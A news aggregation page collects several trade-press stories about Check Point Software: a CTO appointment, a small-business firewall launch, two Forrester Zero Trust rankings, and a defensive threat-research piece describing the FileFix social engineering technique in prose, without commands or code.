Latest news with #CheckPointSoftwareTechnologies


Techday NZ
4 days ago
- Business
- Techday NZ
Jonathan Zanger named CTO to advance AI at Check Point
Jonathan Zanger has been appointed as Chief Technology Officer at Check Point Software Technologies and will lead the company's global cyber security and artificial intelligence (AI) initiatives. Zanger steps into the CTO role with over 15 years of experience focused on developing and scaling cyber security and AI-based platforms. Prior to assuming this position, he served as CTO at Trigo, a company specialising in advanced AI and computer vision systems for autonomous retail. His academic background includes advanced degrees in Electrical Engineering and Computer Science, as well as an MBA from the Massachusetts Institute of Technology (MIT). In his new role, Zanger will be responsible for shaping the evolution of Check Point's AI strategy. One of his main tasks will be embedding automation and machine learning across the Check Point Infinity Platform to support the company's prevention-first approach to cyber security. The objective is to enable more effective protection against the evolving landscape of cyber threats affecting enterprises operating in increasingly digital and hybrid environments. The company's recognition as a leader in the Forrester Wave: Zero Trust Platform, Q3 2025 report, highlighted its ongoing efforts in AI. The report specifically noted Check Point's "plan to deliver AI-driven capabilities to automate network security functions." Additionally, Miercom has validated Check Point as one of the top-performing AI-powered security platforms in the sector, reflecting its achievements in automation and intelligent security management. "AI is fundamentally reshaping both how cyber threats emerge and how we defend against them," said Nadav Zafrir, CEO at Check Point Software Technologies. "Jonathan's deep technical expertise and leadership in cyber security and applied AI, will accelerate our mission to deliver prevention-first security for a hyperconnected world. His appointment reinforces our commitment to shaping the future of cyber defence through bold innovation." With AI's growing role in both advancing and combating cyber attacks, Check Point's new leadership aims to implement machine learning and automation from network gateways to the cloud. The expansion of the company's AI capabilities will be guided by Zanger's technical and strategic expertise in the field. "I'm thrilled to join Check Point at such a pivotal moment," said Jonathan Zanger, Chief Technology Officer at Check Point. "Cyber security must evolve faster than the threats it's designed to stop. By embedding AI across every layer of our architecture, from gateways to the cloud, we're not just keeping pace, we're setting the pace." The appointment of Zanger comes as Check Point continues to expand its investment in AI and reinforce its talent pool in cyber defence. The company's approach involves a unified strategy that integrates various environments - on-premises, hybrid, and cloud - under one management framework, while focusing on automation and continuous monitoring. Check Point's Infinity Platform and ecosystem aim to support enterprise and service provider clients as digital transformation accelerates. Through its prevention-first ethos and open garden ecosystem, Check Point seeks to address the demands of hybrid mesh network architecture, security efficacy, and operational scalability across diverse IT environments. Zanger's focus will now be on aligning Check Point's future AI strategy with industry demands for intelligent and unified security solutions. His leadership is expected to further the company's objectives as it bolsters its approach to prevention-first cyber security through AI integration. Follow us on: Share on:


TECHx
17-07-2025
- TECHx
FileFix: A New Social Engineering Threat Emerges
Home » Top stories » FileFix: A New Social Engineering Threat Emerges Check Point Research identifies how the new social engineering technique, FileFix, is being actively tested by threat actors in the wild. Attackers have long exploited human trust as a primary attack surface, and they're doing it again with a new technique called FileFix. FileFix is a recently uncovered social engineering attack that builds on the widely abused ClickFix tactic. Unlike ClickFix, which tricks users into running malicious commands via the Windows Run dialog, FileFix takes a subtler approach: it opens a legitimate Windows File Explorer window from a webpage and silently loads a disguised PowerShell command into the user's clipboard. When the victim pastes into the Explorer address bar, the malicious command executes. This attack relies not on software vulnerabilities but on exploiting routine user actions and trust. Within just two weeks of FileFix's public disclosure, Check Point Research observed this technique being actively tested in the wild by a known threat actor. This group previously deployed ClickFix-based phishing campaigns targeting users of major cryptocurrency platforms. The FileFix tests so far use benign payloads, signaling an imminent shift to delivering real malware. During the same period, threat group KongTuke was also found using the method in a recent campaign. With FileFix now operational in real-world campaigns, defenders must prepare for the next phase: full-scale deployment of malicious payloads using this technique. The attack infrastructure is established, and it's only a matter of time before FileFix causes significant damage. 'Threat actors began using FileFix less than two weeks after it was published, showing just how quickly cyber criminals adapt. Like ClickFix, this technique doesn't rely on complex exploits, but on manipulating routine user behavior. By shifting from the Run dialog to File Explorer, attackers are now hiding in plain sight, making detection harder and the threat more dangerous,' said Eli Smadja, Group Manager, Security Research at Check Point Software Technologies. This blog will explain how the FileFix attack works, profile the threat actor testing it, and provide actionable guidance for defenders to detect, block, and prepare for this evolving threat. Background: The Rise of FakeCaptcha/FixIt/ClickFix Attacks ClickFix is a simple but highly effective social engineering trick. It convinces users to run malicious code by pretending there's a technical problem that needs fixing, like a broken CAPTCHA or browser error. Victims are typically told to copy and paste a command into the Windows Run dialog, unknowingly infecting themselves in the process. Over the past year, ClickFix attacks have surged, evolving into one of the most common initial access methods. Attackers spoof familiar services and design convincing error messages to lower users' defenses. This success paved the way for FileFix, a new variation with even subtler execution. The FileFix Technique: An Evolution of ClickFix Social Engineering Attacks Building on the widespread success of the ClickFix social engineering attack, security researcher mr.d0x introduced FileFix on June 23, 2025, a new, stealthier technique designed to trick users into executing malicious commands without raising suspicion. Unlike ClickFix, which relies on the more noticeable Windows Run dialog, FileFix shifts the attack to the familiar and trusted environment of Windows File Explorer. This technique does not exploit software vulnerabilities; instead, it leverages user trust in everyday Windows actions to execute harmful code. How FileFix works A malicious webpage can launch a Windows Explorer window on the victim's computer. Simultaneously, JavaScript running on that webpage quietly copies a disguised PowerShell command to the user's clipboard. The victim is then instructed to paste a 'file path' into the Explorer address bar. Instead of a real file path, the pasted content is a hidden PowerShell command. When the user presses Enter, Windows Explorer executes the command, which downloads and runs malware, all without displaying any obvious warning or command prompt. To victims, this process appears to be a simple task of opening a shared file or folder, making it feel routine and safe. This subtle manipulation makes FileFix a more stealthy and potentially more dangerous evolution of the ClickFix social engineering attack. The phishing site after being updated to deliver a malicious script Our Discovery: FileFix Technique Actively Tested in the Wild by Known Threat Actors Just over two weeks after the FileFix social engineering technique was publicly disclosed, in early July 2025, Check Point Research observed cyber criminals actively testing this new attack method in real-world campaigns. The threat actor, previously known for leveraging the ClickFix technique to distribute malware such as loaders, remote access Trojans (RATs), and information stealers, has begun experimenting with FileFix as part of their phishing operations. On July 6, 2025, we detected a newly registered domain hosting a phishing page closely resembling this group's earlier campaigns. Although the embedded FileFix script initially delivered only a benign payload, the activity clearly signals that threat actors are preparing to weaponize FileFix for future malware distribution and targeted attacks. Threat Actor Profile & Past Activity This threat actor has a history of targeting users of major cryptocurrency exchanges and other legitimate services. Their primary lure technique is SEO poisoning, which involves manipulating search engine results to promote malicious sites to the top. For example, a recent attack used a malicious sponsored Bing ad (malvertising) directing a victim to a fake 1Password site, where they were tricked into executing a ClickFix script that installed a NetSupport Manager remote access tool on their machine. A signature trait of this actor's phishing pages is their consistent imitation of Cloudflare CAPTCHA or security verification screens. To broaden their reach, the actor translates their lures into multiple languages including English, Korean, Slovak, and Russian, making their campaigns global and adaptable. Phishing pages in different languages Threat actors started using the new FileFix technique less than two weeks after its publication, demonstrating how quickly cyber criminals adapt to emerging trends. Techniques like ClickFix have emerged as some of the most effective initial access methods, not through technical exploits but via low-cost, high-impact manipulation of user behavior. Preparing for the Next Wave of Social Engineering Attacks: Defending Against FileFix and ClickFix The rapid rise of the ClickFix technique in 2025 highlights that social engineering remains one of the most cost-effective and enduring methods cyber criminals use to breach defenses. This approach exploits human behavior by tricking users into unknowingly executing malicious commands on their own computers. FileFix advances this tactic by concealing harmful commands behind the seemingly harmless act of opening files in Windows File Explorer. The fact that FileFix is already being tested and used in the wild mere days after its public disclosure shows how quickly attackers adopt new techniques and adapt to the evolving cyber threat landscape. Key Recommendations for Defenders and Users Be highly suspicious of any webpage or email that asks you to perform unusual manual actions, especially copying and pasting commands into system dialogs or Windows Explorer address bars. Educate users that legitimate websites and software rarely require manual execution of commands to fix issues. Monitor phishing pages that mimic popular services or security verification screens, particularly those using Cloudflare-like templates or recurring fake identifiers like Ray IDs. Implement and fine-tune endpoint detection rules to flag suspicious clipboard activity or unusual PowerShell executions triggered by user actions. Stay current with emerging social engineering trends and regularly update user training, incident response plans, and security playbooks. Foster a culture of verification where users confirm unexpected or unusual requests with IT or security teams before acting. Staying informed and vigilant is critical to preventing attackers from turning users into unwitting accomplices. Leveraging Endpoint Protection with Check Point Harmony Endpoint Tools like Check Point's Harmony Endpoint offer advanced endpoint detection and response capabilities designed to identify suspicious behaviors, such as unusual clipboard manipulation or stealthy PowerShell command executions initiated by user interactions. By combining proactive threat hunting, behavioral analytics, and real-time blocking, Harmony Endpoint empowers organizations to detect and stop evolving social engineering attacks like FileFix and ClickFix before they cause damage. In today's fast-changing threat environment, deploying intelligent endpoint protection solutions is essential to strengthening your organization's last line of defense.


Techday NZ
17-07-2025
- Business
- Techday NZ
Check Point launches Quantum Spark 2500 firewalls for SMB security
Check Point Software Technologies has introduced the Quantum Spark 2500 series, a new firewall product family tailored for small and medium-sized businesses and managed service providers. With the reported rise in cyberattacks targeting smaller organisations, Check Point Research notes that SMBs experienced a 61% year-over-year increase in cyberattacks, which exceeds the rate of increase observed in larger enterprises. This comes as cloud and SaaS bandwidth demands have also more than doubled over the past two years. With many SMBs lacking dedicated IT teams, there is growing reliance on managed service providers to deal with these increasingly complex security environments. Security and connectivity The Quantum Spark 2500 series is presented as an all-in-one solution offering several new features. These include built-in Wi-Fi 7, 5G connectivity, SD-WAN capabilities, and AI-driven threat prevention. These appliances are part of Check Point's Infinity architecture and are designed to support fast, secure, and resilient connectivity. "The Quantum Spark 2500 series deliver a critical combination of security, speed, and simplicity. With AI-powered prevention, next-generation connectivity, and centralised cloud management, it empowers SMBs to scale securely without the burden of complex operations." This statement was made by Shahar Divon, Director of Worldwide MSSP and SMB Sales at Check Point Software Technologies. Pete Finalle, Research Manager, IDC Security and Trust, commented on the difficulties faced by SMBs in the current threat environment. He noted, "Small and medium sized businesses are faced with an increasingly sophisticated threat-landscape, without the resources and dedicated personnel of larger enterprises. While managed service providers (MSPs) can help with deployment and management, they require security tools which solve modern security problems efficiently and effectively." Finalle added, "Check Point's new Quantum Spark 2500 gateways and updated cloud-based security management offer high-performance threat prevention, accelerated connectivity with Wi-Fi 7, 5G, and SD-WAN, and protection for IoT devices. With multi-tier, multi-tenant management and zero-touch provisioning, Check Point is equipping MSPs with purpose-built tools that are ideal for protecting any size SMB from evolving threats." Key features The Quantum Spark 2500 series includes several core features: Wi-Fi 7 and 5G built in: Embedded Wi-Fi 7 and dual-SIM 5G support enable speeds up to 2.4 times faster than previous models and simplify remote access. SD-WAN functionality is included to deliver stable connectivity for organisations with cloud-first operations. Embedded Wi-Fi 7 and dual-SIM 5G support enable speeds up to 2.4 times faster than previous models and simplify remote access. SD-WAN functionality is included to deliver stable connectivity for organisations with cloud-first operations. AI-powered threat prevention: The appliances use ThreatCloud AI technology to achieve a claimed 99.9% malware prevention rate, including for ransomware, phishing, and zero-day exploits. Reported firewall throughput reaches up to 2.7 Gbps. The appliances use ThreatCloud AI technology to achieve a claimed 99.9% malware prevention rate, including for ransomware, phishing, and zero-day exploits. Reported firewall throughput reaches up to 2.7 Gbps. Managed Application Protection (MAP): This feature identifies and controls shadow IT and high-risk software-as-a-service usage for better visibility, compliance, and data security. This feature identifies and controls shadow IT and high-risk software-as-a-service usage for better visibility, compliance, and data security. Built-in resilience: Dual power supplies, dual ISP ports, and optional clustering options increase availability and business continuity during outages. Dual power supplies, dual ISP ports, and optional clustering options increase availability and business continuity during outages. Zero-touch provisioning and cloud management: Integration with Check Point's Infinity Portal provides remote provisioning, real-time alerts, multi-tenant dashboards, and supports streamlined operations for service providers. Integration and flexibility The Quantum Spark 2500 series is part of the Check Point Infinity Platform. This supports hybrid mesh security across networks, cloud, and endpoints, aligning with the firm's open garden approach. The appliances are designed to be interoperable with third-party platforms, giving users more choice and avoiding vendor lock-in. The Quantum Spark 2500 series appliances are now available for order through Check Point's official channels. Follow us on: Share on:


Channel Post MEA
16-07-2025
- Business
- Channel Post MEA
Check Point Named Leader In Zero Trust Platforms
Check Point Software Technologies has announced it has been recognized as a Leader in The Forrester Wave: Zero Trust Platforms, Q3 2025. The independent analyst report evaluated the 10 most significant Zero Trust platform providers and cited Check Point for delivering a unified, prevention-first security platform that covers network, cloud, and endpoint controls across hybrid environments. Check Point received the highest possible scores (5 out of 5) in four critical criteria within the current offering category: centralized management and usability, least-privileged-access enforcement, segmentation and control, and deployment. The company also received 5/5 scores in the roadmap and supporting services and offerings criteria within the strategy category, which Check Point believes reinforces its strong vision and customer-centric approach. 'This recognition by Forrester affirms, for us, Check Point's leadership in delivering consistent Zero Trust security that is comprehensive, intuitive, and built for the AI-driven, hyperconnected world,' said Nataly Kremer, Chief Product Officer at Check Point Software. 'Our AI-powered Infinity Platform is purpose-built to help organizations secure users, assets, and data — wherever they reside — through centralized management, intelligent policy enforcement, and flexible deployment across cloud, on-prem, and hybrid environments.' Check Point's highlights from the report include: Centralized Management Least-Privileged Access Enforcement Segmentation and control Deployment Roadmap Supporting services and offerings Forrester also noted that organizations looking for a centralized, easy-to-manage, and holistic network security platform for local networks should include Check Point on their shortlist. For Check Point, this position as a leader reinforces the company's commitment to a prevention-first strategy, helping enterprises proactively secure their infrastructure against modern threats while accelerating their Zero Trust adoption.


Techday NZ
14-07-2025
- Business
- Techday NZ
Check Point named a Leader in Forrester Wave Zero Trust report
Check Point Software Technologies has been named as a Leader in The Forrester Wave: Zero Trust Platforms, Q3 2025 report, following an assessment of ten prominent Zero Trust platform suppliers. The independent analysis conducted by Forrester evaluated platforms for their ability to provide comprehensive security controls across network, cloud and endpoint environments within hybrid IT landscapes. Check Point's performance was highlighted specifically for its unified, prevention-first approach to security management. Evaluation results Check Point received the highest feasible scores, 5 out of 5, across several key criteria in the current offering category, including centralised management and usability, least-privileged-access enforcement, segmentation and control, as well as deployment. The company also achieved perfect marks in the roadmap and supporting services and offerings criteria within the strategy category. The platform, referred to as the Infinity Platform, is designed to deliver centralised management, intelligent policy enforcement, and flexible deployment options across cloud, on-premises, and hybrid environments, supporting organisations in securing users, assets, and data wherever they are located. "This recognition by Forrester affirms, for us, Check Point's leadership in delivering consistent Zero Trust security that is comprehensive, intuitive, and built for the AI-driven, hyperconnected world," said Nataly Kremer, Chief Product Officer at Check Point Software. "Our AI-powered Infinity Platform is purpose-built to help organisations secure users, assets, and data - wherever they reside - through centralised management, intelligent policy enforcement, and flexible deployment across cloud, on-prem, and hybrid environments." Highlighted strengths Key strengths for Check Point, as cited in the Forrester report, include its capabilities in centralised management, least-privileged access enforcement, network segmentation, and streamlined deployment processes. In the opinion of the analysts, the company's product roadmap and range of supporting services further reinforce Check Point's vision and customer-orientated approach to security. The report also stated that organisations seeking a centralised, easy-to-manage, and holistic network security platform for local networks should consider including Check Point among their shortlist. Strategy and prevention-first focus Check Point's approach to Zero Trust security is underpinned by a prevention-first strategy, which the company states assists enterprises in proactively protecting their infrastructure against evolving threats, as well as accelerating Zero Trust adoption. The platform is described as offering unified security controls for contemporary IT environments that encompass a range of deployment options and management requirements. The Forrester Wave: Zero Trust Platforms, Q3 2025, is produced as part of an independent comparative research process that assesses vendors by a defined set of criteria. Forrester's disclaimer notes that it does not endorse any company, product, or service included within its research, nor does it advise any party to select solutions exclusively based on the research findings or ratings. All information in the report is based on the best available resources at the time and reflects the analysts' judgement, which may be subject to change.